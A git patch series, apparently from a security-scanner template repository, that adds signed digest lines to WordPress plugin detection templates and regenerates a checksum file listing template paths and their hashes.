4a0a0047304502202fa51b7060e4bb18976a21519067c54c0dbc8e91fbe50821b5e1cd0e8f9b1fb3022100c4f09621951f5a234bb7b018e55f4e8e8b0a891d193bd2d237e621644b23047b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 062e5c85b49..8f429f31357 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ad5f880a2e3f6a3e85d73566b1e09682714e63a58cc7b31905b157a39844d42602204adb0be0dbcfb0bbf46ebaf828b44418a45d20d8dc47d3b14a9c9505db4eb0fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 6dcfdda1174..df24e4294a9 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022028b65b533a28836a9e78665f1b68f20824f05271589f6a791660e5c45243b0bd0220120ba40d5a24cd3640bf081f67bf37251e4c4e1cc0c63a4542aca9912917e3a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/generic/open-redirect-generic.yaml b/http/vulnerabilities/generic/open-redirect-generic.yaml index 025d5a32943..deb394d9ab0 100644 --- a/http/vulnerabilities/generic/open-redirect-generic.yaml +++ b/http/vulnerabilities/generic/open-redirect-generic.yaml @@ -130,4 +130,4 @@ http: - 307 - 308 condition: or -# digest: 4b0a00483046022100f4fe9201a11ea90485c2a26c406a0dbecb9ea8e674bf3ccbcaf01ed4c57421c3022100a9c075d4a231b4acd4adfce87b2f858c65cb9dc3b896d7b07759c4395e0be18f:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100b327ea17f154456b706a540e72c9c79e4c901a70091e38648ed261ecd5b0094502202f0ae209b845dc30c6fb92d9f33617dbca5720568776d2b1e8df2c17cb36202d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 9e6be0b5e89d25f7819aa19221456d7654e834c2 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 14 Jul 2024 08:44:24 +0000 Subject: [PATCH 132/247] Auto Generated Templates Checksum [Sun Jul 14 08:44:24 UTC 2024] :robot: --- templates-checksum.txt | 408 ++++++++++++++++++++--------------------- 1 file changed, 204 insertions(+), 204 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index d90b366a0ef..20bd3ba60f9 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -240,7 +240,7 @@ dast/vulnerabilities/injection/xinclude-injection.yaml:ebe8c7fa9a358fc76e42e1be9 dast/vulnerabilities/lfi/lfi-keyed.yaml:62584249ea749ce960527d6675421d9d857d1d7c dast/vulnerabilities/lfi/linux-lfi-fuzz.yaml:bd17c8e51fd1ba5083eb381c1ca1a3792597ef65 dast/vulnerabilities/lfi/windows-lfi-fuzz.yaml:218f24aa37dd58a83d33318e22794a3d30c25c13 -dast/vulnerabilities/redirect/open-redirect.yaml:68ac64ef8cf7ae88c1484f5c178057ebdcd8023b +dast/vulnerabilities/redirect/open-redirect.yaml:2f05e6169e385b0142d95ee6918e5c0e36bc4224 dast/vulnerabilities/rfi/generic-rfi.yaml:de3d066b0dc329ffbb333def6e7f1a5a4c1d5836 dast/vulnerabilities/sqli/sqli-error-based.yaml:13195b21140da0c8c21d2580efe17d40536dc75f dast/vulnerabilities/sqli/time-based-sqli.yaml:c0bf67162953a70d11c3915a49e2a19a459b5f74 @@ -5823,7 +5823,7 @@ http/misconfiguration/mingyu-xmlrpc-sock-adduser.yaml:d680c0d1f329ae9d5f114cf4ac http/misconfiguration/misconfigured-concrete5.yaml:d56475cb0edd78cf18150ac40eba183c0a201d7d http/misconfiguration/misconfigured-docker.yaml:ca18899f575d3f7df82e3a33e2a9b4b0f75582ef http/misconfiguration/missing-sri.yaml:1bc66d65f6b661a47fc8925571630064bbcd8e40 -http/misconfiguration/mixed-active-content.yaml:488f8534a4929b8deb745780feea319f8d9decbd +http/misconfiguration/mixed-active-content.yaml:ceb7f34460e65ee99552442d17590a164b60d28e http/misconfiguration/mixed-passive-content.yaml:58ad91895597b997aadc184d4489f699e8b886dc http/misconfiguration/mlflow-unauth.yaml:782c87a81f600d3dd2782e60f63080d361abbb93 http/misconfiguration/mobiproxy-dashboard.yaml:4d76a953ef877f0847e2722091d679b905023cc8 @@ -7279,228 +7279,228 @@ http/technologies/werkzeug-debugger-detect.yaml:af81a25156ac286ceb63a2599e8b8ddf http/technologies/wing-ftp-service-detect.yaml:02d0508b1caca874343eacbe1526d020160193cc http/technologies/wms-server-detect.yaml:a12dcf5c63bb483cadc2179824ea7bc811565a9d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 -http/technologies/wordpress/plugins/ad-inserter.yaml:bb2b6a2cefcec61917f7c15ee96e80a750f1d703 -http/technologies/wordpress/plugins/add-to-any.yaml:09e1ee7958521db8ab328e41fc0b2e15a735e7d3 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:df8964abf44d766617dbeeba4395f6f901a1b142 +http/technologies/wordpress/plugins/ad-inserter.yaml:2c03be2a489d02086e8813d7ad847c0ad3dd7aed +http/technologies/wordpress/plugins/add-to-any.yaml:3aa9016ef0d3ea59baa3fe10c9adf934be896387 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:894597d021248e51e6a89adc455688ef7478c067 http/technologies/wordpress/plugins/adminimize.yaml:fe9261de252e3a80da843e6bd6b356825bb37611 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:44a3c2e8c28b0a7c380fff8b194f80bc0b85209d -http/technologies/wordpress/plugins/akismet.yaml:a7c535fa20e8248b7d4b8c3dcd004f82ce282861 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:99e512547b8ccd401a46cd9c39584fa5804eca70 +http/technologies/wordpress/plugins/akismet.yaml:a01aefeac3fcfeebfb1af663a2d78ed6898e7170 http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:cd265a5fec513a57ee120b7713fc294eae0d745b -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:e2f1f49e2fdfb1a7afcdf39851e892df5445bcc1 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:4147669572a756fa71f8386e52115124747b3375 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:0e58d08bff14a5bdcf74b0071ab30493843b7897 -http/technologies/wordpress/plugins/amp.yaml:59ccd6bfaedca34352633d519865cb5daf5cb295 -http/technologies/wordpress/plugins/antispam-bee.yaml:83282137b06b9d2725b87a1cc5a252e150a7289c -http/technologies/wordpress/plugins/astra-sites.yaml:16090e25b8fe43606f16c162171f7bfca5904f3e +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:237029cee578746310d220dc0a9673052fa1f525 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:90b75d28fcb36d92c4edc2a2441c00edbfc45181 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:03eaa1bfc120647a3d2a5e9cc574ee6cd3705f5d +http/technologies/wordpress/plugins/amp.yaml:7e933d54de0c7c47f5610cfb4340f36150e753c5 +http/technologies/wordpress/plugins/antispam-bee.yaml:e5e3072d23794684cafa941394b46fd96a28adaa +http/technologies/wordpress/plugins/astra-sites.yaml:7bbc9d8214f5301a1ae996d1bff4277eb28bd904 http/technologies/wordpress/plugins/astra-widgets.yaml:a03bab29952a3b69ee9f684a36a3ba67ff4b8d09 -http/technologies/wordpress/plugins/autoptimize.yaml:7d1bf01c79ad1ccc3f93ae7ca50dd1dc848a8a50 -http/technologies/wordpress/plugins/backwpup.yaml:37a7481e252cd63ce9470fe090c12238683edc30 -http/technologies/wordpress/plugins/better-search-replace.yaml:f5ba1713c0d0c57feff23cd61f09adff485c1719 -http/technologies/wordpress/plugins/better-wp-security.yaml:b6b6b09969408686afbd99a8f501869efd3d9da7 -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:9cde38ae78739088c0bd65304fb8d6531ef56533 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:34318fb63b04eba5f885e412e63eae18522719c2 -http/technologies/wordpress/plugins/breeze.yaml:e10adf37977d9912d3fbd5ccfd883eb279807d62 -http/technologies/wordpress/plugins/broken-link-checker.yaml:0213894e372f547ebaf10f75363f69db5f9ca1ba -http/technologies/wordpress/plugins/chaty.yaml:62cbf438b45f57052b4e03b5c0df71efdf66a6ff -http/technologies/wordpress/plugins/child-theme-configurator.yaml:5731175c0dfbe3a3df0e3a6e689be856fc69516d -http/technologies/wordpress/plugins/classic-editor.yaml:571df5057165afdd6c854028b0050a93a3a03d52 -http/technologies/wordpress/plugins/classic-widgets.yaml:0b4ade396e68a29fd134770790ea78081ab767a6 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:be13071cd6582b3cb210ad89c10fc6e0957bd131 +http/technologies/wordpress/plugins/autoptimize.yaml:bd4204a8d3304faf8f87a47f16fd7050ab837076 +http/technologies/wordpress/plugins/backwpup.yaml:5c96d6d1cc1e4c06630a430c38947c7a98954488 +http/technologies/wordpress/plugins/better-search-replace.yaml:a1a8ab4353c0dd975cc6922ca883f85b3babab8b +http/technologies/wordpress/plugins/better-wp-security.yaml:9238b4e15a9c87629b34b378bf6dd5bafbb9268a +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:da7756b499eb168d91279ffcb8300024170b8ed4 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:1a97cb21f5bc2880fcb34e370f42edbf1b2cb25f +http/technologies/wordpress/plugins/breeze.yaml:de3c7485b46fe3723c378d33c66303ada6ab08c9 +http/technologies/wordpress/plugins/broken-link-checker.yaml:0c5e75220423ab609c0cec2f9d8bba9da6a6a745 +http/technologies/wordpress/plugins/chaty.yaml:4b22e2f7d14295a1397a0501b749824b20e51562 +http/technologies/wordpress/plugins/child-theme-configurator.yaml:448b32b3a09451524b4611bb574a0af514d3d112 +http/technologies/wordpress/plugins/classic-editor.yaml:f9de7282e8a4f3636f8289a74892ab1b133709e2 +http/technologies/wordpress/plugins/classic-widgets.yaml:0671a4fb0b3a51406a7cd855b58aabea7fd4fdbc +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:8cb9275d92436c072ba9e5fe7673fa4df48bc3a9 http/technologies/wordpress/plugins/cloudflare.yaml:77ed711d2f95dbfd368b8018e0859cc792bd92e8 -http/technologies/wordpress/plugins/cmb2.yaml:b1e8cafb11ee15d77391e1a02392af8cccba57f8 -http/technologies/wordpress/plugins/coblocks.yaml:a34822c69420495a9273affddf9194537282a30d -http/technologies/wordpress/plugins/code-snippets.yaml:678b681cd40897764ec166dea99de8478181954c -http/technologies/wordpress/plugins/coming-soon.yaml:0f3ded7600e1fa0bd83eb57744dfd945ba58dd73 -http/technologies/wordpress/plugins/complianz-gdpr.yaml:74b77fc63e2878a7d4f92f3a4b7f55c7e968ef6b -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:b7d102f65a73bdd3b009e0a7ad81e447d3eaa88d -http/technologies/wordpress/plugins/contact-form-7.yaml:140ba02fcbd12efc5d09525f322fb443d6b2ad57 -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:ab0ad7bfdd3ea91630c85b581daab66df5554c48 -http/technologies/wordpress/plugins/cookie-law-info.yaml:a7af47d278ad5eb7224c350eb2246c432e3288d3 -http/technologies/wordpress/plugins/cookie-notice.yaml:de50919a6a468a9878240d88e8ddf4f9d52fb176 -http/technologies/wordpress/plugins/copy-delete-posts.yaml:0e850184e814cce643bbf4ad50036499a316ef5b -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:5d6aa81f5fd085008d3137a640ae215211b4c0c2 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:096ba6d050e5a6419cff50741d7f3e5907d9bf75 -http/technologies/wordpress/plugins/custom-css-js.yaml:4459e4d2fcf25c6b65ccf035c24fa8777c48f08c -http/technologies/wordpress/plugins/custom-fonts.yaml:08c475c2849a90c08b82b758cfe5b9aee0cd711d -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:edc7a821b6fe5b015138a01d2ebc3e6513f491f9 -http/technologies/wordpress/plugins/disable-comments.yaml:8c1ccb3aa597c3bf0c16e84bf79a6f136b13fe3c -http/technologies/wordpress/plugins/disable-gutenberg.yaml:c5f1d33397f74e2566cccfe9adf4149eb14b4a11 -http/technologies/wordpress/plugins/duplicate-page.yaml:6f972f4970eef86897f9b7aff1c0c74f6edf5f41 -http/technologies/wordpress/plugins/duplicate-post.yaml:c8b511a66ff43a45ffedd1b88a46d40e53a8005e -http/technologies/wordpress/plugins/duplicator.yaml:f6e89d5511f41ab8fead85b58a61d82176319d44 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:13b2156be104efcc96069f119cdc2c858b5aed3a +http/technologies/wordpress/plugins/cmb2.yaml:262d760e3cabbf08044b70eaa37648444a513e10 +http/technologies/wordpress/plugins/coblocks.yaml:74c1b3d0a30c62f647866d328875034cf03e767d +http/technologies/wordpress/plugins/code-snippets.yaml:a415bf81573b7cd6e21cf80c977d15217b66733c +http/technologies/wordpress/plugins/coming-soon.yaml:56ff6cd44ed553dab7557381f6826bc22be6d0d6 +http/technologies/wordpress/plugins/complianz-gdpr.yaml:45ab5ff533729da12df15efdc2af5d6076dd63dd +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:25f25560c6191b9b13dcdd39f20657817f8dd712 +http/technologies/wordpress/plugins/contact-form-7.yaml:9b18111c1d3ef8aa0a9a14e3c3d1dee75519e022 +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:dc6f12cabb4452f9b7db40f2d0f4cf6014dc5e9f +http/technologies/wordpress/plugins/cookie-law-info.yaml:501cfd5ed8d2a41ccc66e8ec96ff4e46ccc4b04f +http/technologies/wordpress/plugins/cookie-notice.yaml:0ea921a09cf09548d3abe14ccaeb61c1d4dfd3f0 +http/technologies/wordpress/plugins/copy-delete-posts.yaml:697e73fbdd31131bd35754609055121a41f6b699 +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:fe531b3a2df00eba3c75bc0d5e18bb9e62ae0815 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:0643adbb4d743a10d1bbd05c906648dbe02e7c88 +http/technologies/wordpress/plugins/custom-css-js.yaml:0a11dbe86ab9af4a07081863b6ca28fa83ab3d48 +http/technologies/wordpress/plugins/custom-fonts.yaml:d213744fc302ec5e41520e3eb0ff9d6c087257f0 +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:b86c36e18e98abb66200d31e62a2cfa618a65347 +http/technologies/wordpress/plugins/disable-comments.yaml:b9954696703cd77dad4562e4a870d90db913aa19 +http/technologies/wordpress/plugins/disable-gutenberg.yaml:a9de4d801db7404bf6111de593ed5c7beac7f466 +http/technologies/wordpress/plugins/duplicate-page.yaml:b61ff2fd9af8662e12e8821f423c24a057cb6fb6 +http/technologies/wordpress/plugins/duplicate-post.yaml:25e0e3e800e8f46ab2a2800b87c945113b90bdc6 +http/technologies/wordpress/plugins/duplicator.yaml:d1938650069f7fb44bb02fef3235903d68e1097c +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:9e3cec9b2c2aa99fc3eaef3e4f67dd9e26fadfc0 http/technologies/wordpress/plugins/easy-fancybox.yaml:91706438bedc39afdeaebdbf43a683bb583c8ec0 http/technologies/wordpress/plugins/easy-google-fonts.yaml:1ac3ed149863a6ce5b4325901c49c6837a4c57ea -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:dc7f8a66d655b230b9f86e7408371b657afec872 -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:7a3c617033da4dea65448ac98079dca7ce9eced7 -http/technologies/wordpress/plugins/elementor.yaml:87e57bed454c1ffa8f1180c092768b884c01fe55 -http/technologies/wordpress/plugins/elementskit-lite.yaml:fd765eb94f1951124b42f0060fdbaf3e41f64f94 -http/technologies/wordpress/plugins/enable-media-replace.yaml:ab31d8de8202f5fe56342e37e2b97b620c04a18d -http/technologies/wordpress/plugins/envato-elements.yaml:1792b1bb18d8e3b75290c49e9481abd752625f7f -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:e955c0301c4d36e1ed0058ca20df5e90550ff64a -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:b0b23c965232eedb1605f21ed92cd3647f6f18d4 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:0d6fa673ecc67045a97cd1b27b6de09368e069bc -http/technologies/wordpress/plugins/fast-indexing-api.yaml:89229b48edbf5b17553d55e6b39521ac3c61abcb -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:05492b67a15c0842ad5d7f263974671b9c461f84 -http/technologies/wordpress/plugins/flamingo.yaml:bbad18399f4057fce68a1019cfb0c177f3f66ad4 -http/technologies/wordpress/plugins/fluentform.yaml:41bab87a01e0ce62341a024bd937104f1072b395 -http/technologies/wordpress/plugins/font-awesome.yaml:d61908d165c5e27d05672655e2a21614d82c7df7 -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:18bdbf5f4ab294b177f0bb0fe1591208b00ba16e -http/technologies/wordpress/plugins/formidable.yaml:fc76ea970f27659d0479ccde36ffea594b78ece7 -http/technologies/wordpress/plugins/forminator.yaml:0d0c8abfd5d9b766e1d1f9ea24639096df336219 -http/technologies/wordpress/plugins/ga-google-analytics.yaml:06ed726b8d2b53d84fb0a0b1a5e7bee8ce776739 -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:eabba7c66e27662066cddd955ed9548285a0a19b -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:b80b8b453286fb2052562066564133d1df4d4522 -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:52e327176ffa0934107760389a7fa6c15d6cd736 -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:98982c9edf9970367b127390e0c459c8b542e7fa -http/technologies/wordpress/plugins/google-site-kit.yaml:61300b4bd7867c298807e347709d0f2084201aa6 -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:38b0d8740502247c857db2223f0d1a3bf68881b1 -http/technologies/wordpress/plugins/gtranslate.yaml:f2c1f59a6c40d7979e51aa224166e4fdae6d61d6 -http/technologies/wordpress/plugins/gutenberg.yaml:b87560081e190486ebe86901eabd5efecc742a51 -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:7403aa1e1055a924ed8a53be33eb00c623f83442 +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:9df52d4dd2ad983b95d13d01fea04d7cb4ab9186 +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:0efe2acb79d92e43fa27ee792d4a445f4da498f2 +http/technologies/wordpress/plugins/elementor.yaml:075b0eaf190ad5e07b7cc2ce6d15da4371304a9f +http/technologies/wordpress/plugins/elementskit-lite.yaml:f96f931d9114e6c50c582a0f4b55a8aeef11cf9b +http/technologies/wordpress/plugins/enable-media-replace.yaml:cfd487b799aed774eab97f87dd4beca2badc2a8d +http/technologies/wordpress/plugins/envato-elements.yaml:900c7cfca6b5ad9094a21de641bb8e7c09dedcf0 +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:2fbe3fcb3a109eab37083c0ce2eef2e2ae4c73f0 +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:e2833cfec91fa398f733fa5c7fd20f655a64dd19 +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:5c630ddc25ea75968102b5be615133102f65623d +http/technologies/wordpress/plugins/fast-indexing-api.yaml:88958a991d8f65107a22b6efa0218c3addca4f5a +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:31ead4d39fadbc3f8f51bdae32da544c7621e243 +http/technologies/wordpress/plugins/flamingo.yaml:cabffa25c6b74c0fb96a850808efc17af8960e27 +http/technologies/wordpress/plugins/fluentform.yaml:45b3e3507dfb7537013958f1b1938486f11fb4db +http/technologies/wordpress/plugins/font-awesome.yaml:b9f79da55fe2e338677134b9469b27f8c533b7fa +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:ab286fe8d474744addd416fe694177c379b8adb2 +http/technologies/wordpress/plugins/formidable.yaml:061286a76e8413a9756d922d5194f7e0a65ea77d +http/technologies/wordpress/plugins/forminator.yaml:e97ae70c01240face06261a9f845348ace00535d +http/technologies/wordpress/plugins/ga-google-analytics.yaml:8e36c7424c04795162da1bc1834a8f818266be4e +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:6a46376b02ee5306a2f20ab7033f072daf7c539d +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:fdea706017e0db8cd8e9e4d0cc9fe17779681d87 +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:b4eea842f7523c7e210167711d49f2e3526aaf79 +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:0bf94e3ac16b15ceebbb256e69da1640f3e7f1c6 +http/technologies/wordpress/plugins/google-site-kit.yaml:c18fec58aa1ded2b835e2d7201687d89eb6e395c +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:646b7cb1fb9d863349d8b6ca8533e02cffd66bd8 +http/technologies/wordpress/plugins/gtranslate.yaml:c411195113f912afa9161125912e6a37d2962f5e +http/technologies/wordpress/plugins/gutenberg.yaml:0e9a8ac60beaa55c4d2d1f363d4f833113510a33 +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:f7f0221d1f60d6f81ff3bfff8c5b342a8e8155f3 http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1d20308687bcbd54bf13c6f4ed88aa5d5707b8e4 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:a4d739ab05a15c526bd7196e0c28108397f46798 -http/technologies/wordpress/plugins/header-footer-elementor.yaml:0f4e464758736202d4cd5f630e3d6ae78183e63d -http/technologies/wordpress/plugins/header-footer.yaml:92936c6a47ff4726b0a7b97c7ea5686b5a8798cf -http/technologies/wordpress/plugins/health-check.yaml:fcf0c9e7e685f9de5b96cf415282e7985bce1918 -http/technologies/wordpress/plugins/hello-dolly.yaml:ca7e60c9eba41d32c0aa040cec2124ee6d9ecae5 -http/technologies/wordpress/plugins/host-webfonts-local.yaml:a2d3e90e76e99a6926515627ccfe2ba73c09bbe3 -http/technologies/wordpress/plugins/hostinger.yaml:3d1716bd2f46fb046fc487e581e644b972a5f161 -http/technologies/wordpress/plugins/image-optimization.yaml:12b0b8d10e65946e41142eb6a461eb801e925582 -http/technologies/wordpress/plugins/imagify.yaml:f085609c741c54a4bf3511d7bae996cc0d4eecff -http/technologies/wordpress/plugins/imsanity.yaml:913e20f768ce7b09c354531f4cf2bbc7db53093b -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:a36556103402d111ca593a49569521b6bc78a2e5 -http/technologies/wordpress/plugins/instagram-feed.yaml:93fb81f5e22e139fd2c0508740d52e896cf210c1 -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:a1363e721f2fe4ce39a3b05309da0f7c5addb465 +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:84f78e7fff0b60ee84c8188955a94fb3745ad5cc +http/technologies/wordpress/plugins/header-footer-elementor.yaml:7867117407e2df15683be3e1b07e41836d36ae75 +http/technologies/wordpress/plugins/header-footer.yaml:7669c8459c89b251840c38c0a984af4a71880909 +http/technologies/wordpress/plugins/health-check.yaml:aed888b41eb3744f0d3d5e0e358b202406809bc2 +http/technologies/wordpress/plugins/hello-dolly.yaml:bd3c195bb7b52f99492666ad723cbeebb4181104 +http/technologies/wordpress/plugins/host-webfonts-local.yaml:5abaae0d471062ba8bfbc49584f99420b385b364 +http/technologies/wordpress/plugins/hostinger.yaml:085205e8fecbb363eb3761569677e0f9a751043f +http/technologies/wordpress/plugins/image-optimization.yaml:a34c72cf076e43b686893a6fa43bddd0764ac943 +http/technologies/wordpress/plugins/imagify.yaml:7379982e337b1d2ba55d8b15a826a0c8b1cd0390 +http/technologies/wordpress/plugins/imsanity.yaml:799da31660dcea941a50e0c864d0cbdd34970b99 +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:c4e64f6e4a9790c57ea04e6b3202721290662ae4 +http/technologies/wordpress/plugins/instagram-feed.yaml:06c1b31b8e4327122c5852eff112036bb3eafe46 +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:f50ff24cc250751d04b1855285357bbd72ac7507 http/technologies/wordpress/plugins/iwp-client.yaml:211621e7048b766fb8fc89837327329d606f1e50 -http/technologies/wordpress/plugins/jetpack-boost.yaml:7ada0ba0e1402f61160f703940af568bbdc5a78f -http/technologies/wordpress/plugins/jetpack.yaml:052e8123fe19a4ccbd88d7057b6220fc09bc49e5 -http/technologies/wordpress/plugins/kadence-blocks.yaml:462e77eee6dac513bd70e0d905c0430be341fc9a -http/technologies/wordpress/plugins/kirki.yaml:ee663466849a6e4a36b2e70523857761de9e4edc -http/technologies/wordpress/plugins/leadin.yaml:23f08928d76eb48d37b1fd9bbc17c729d533ebfb -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:a7f5642dee515d041e6f09dcd42eead3aed66ba7 -http/technologies/wordpress/plugins/limit-login-attempts.yaml:3f9d5d7dc7e5ceee331b6ae8a8a280dd4937064c -http/technologies/wordpress/plugins/litespeed-cache.yaml:5be7ee817bf0054050bfd6590f987f5e6020acb9 -http/technologies/wordpress/plugins/loco-translate.yaml:3566c32068b67384b7867192b410b9af6fd8f958 -http/technologies/wordpress/plugins/loginizer.yaml:df5aaf6c0fc123cdf155860b02497d948055b5ab +http/technologies/wordpress/plugins/jetpack-boost.yaml:3c9a775ac2b46f4f6324a628d9c8579d3aff74f3 +http/technologies/wordpress/plugins/jetpack.yaml:7c86431be04ac1a6221fefbb83d7f2f4b502617e +http/technologies/wordpress/plugins/kadence-blocks.yaml:8325c2770e8f5ea58a8b4d4d76abea9fb0ff9302 +http/technologies/wordpress/plugins/kirki.yaml:45a1d73a1e202bcd32e919899e3b3576f13beb22 +http/technologies/wordpress/plugins/leadin.yaml:9789b925d06c78e4c9bacd5ffd124abaaf7284ab +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:12190d9f75ccebe1b916d722d4c1fbe3822329be +http/technologies/wordpress/plugins/limit-login-attempts.yaml:2ab47cc04451ffa9d2fb6b5cbc5e9394c26781c6 +http/technologies/wordpress/plugins/litespeed-cache.yaml:3ec74d723dfa9be2ed9347e9c6e8a0c4c14bb2f8 +http/technologies/wordpress/plugins/loco-translate.yaml:a7350b2f883e5d952aebf0e6b43f18ee9244a1c6 +http/technologies/wordpress/plugins/loginizer.yaml:723ba128e6f6f614f9374a6000f3eb6b7d4cebae http/technologies/wordpress/plugins/loginpress.yaml:f3214f698e4519506749dc1c78c6c6f592d55cd7 -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:772f0c28175630aec6a63eb504d2ea1b74a25dd2 -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:1c05f90eb50f3a8f072925cd0303e84b199e41ec -http/technologies/wordpress/plugins/mailpoet.yaml:76728bbd00bb646eec55a8a5e6c469a30a718300 -http/technologies/wordpress/plugins/maintenance.yaml:44bd53f11dedde34fbc81dd58604744f1d183223 -http/technologies/wordpress/plugins/mainwp-child.yaml:fbf0ec1689a90f783c8ceb02f7a04382c39309e5 -http/technologies/wordpress/plugins/malcare-security.yaml:5f2ef05bae54a6a05dba95fac2c45753422d9185 -http/technologies/wordpress/plugins/megamenu.yaml:3a3867b2e7000490acec8a1db0f7765ed9fc8fe1 -http/technologies/wordpress/plugins/members.yaml:ba857dc41e1d31243de30015c4d9470d42df8c53 -http/technologies/wordpress/plugins/meta-box.yaml:8c38bd4306888e54dc3391102d10fa72837e1043 -http/technologies/wordpress/plugins/metform.yaml:90f52dbae57fb96e16c98281f8524d0daf351e9e -http/technologies/wordpress/plugins/ml-slider.yaml:7ed06a67a393d9bf9c1354a894fa26bca17fd4a2 -http/technologies/wordpress/plugins/newsletter.yaml:3ee3c651239599cb45dcf220c7409494c9ebe9c3 -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:0c33021a4eefb6a660c593071371537361dfb84d -http/technologies/wordpress/plugins/nextgen-gallery.yaml:ea5e79cd98b84b48b69a0145227d4ec435ed5392 -http/technologies/wordpress/plugins/ninja-forms.yaml:eaafa820796d0c404ee59dd9efefab26c58c4624 -http/technologies/wordpress/plugins/ocean-extra.yaml:65228be6752d1dc95c05dd0a4c75209b04a41790 -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:42b1aeba39e9d1062b8b35b5d6fc1c9ac92914f0 -http/technologies/wordpress/plugins/one-click-demo-import.yaml:9b10160492a86d235ec330579fdefa5eb92b1a95 -http/technologies/wordpress/plugins/optinmonster.yaml:cb72b324f850b87de1beac0dce1f120bd5e89a47 -http/technologies/wordpress/plugins/otter-blocks.yaml:1d77ec76194db956e207c4671a626de6fb1b20e7 -http/technologies/wordpress/plugins/password-protected.yaml:691f351480bb6cd23aa7afedf5dcde3862b61154 -http/technologies/wordpress/plugins/pdf-embedder.yaml:93ec0b4ddeff00afbd2b34a4e49371ceb2d4c48d +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:b2b36f93092790fb749aff90eb816d0f2257765e 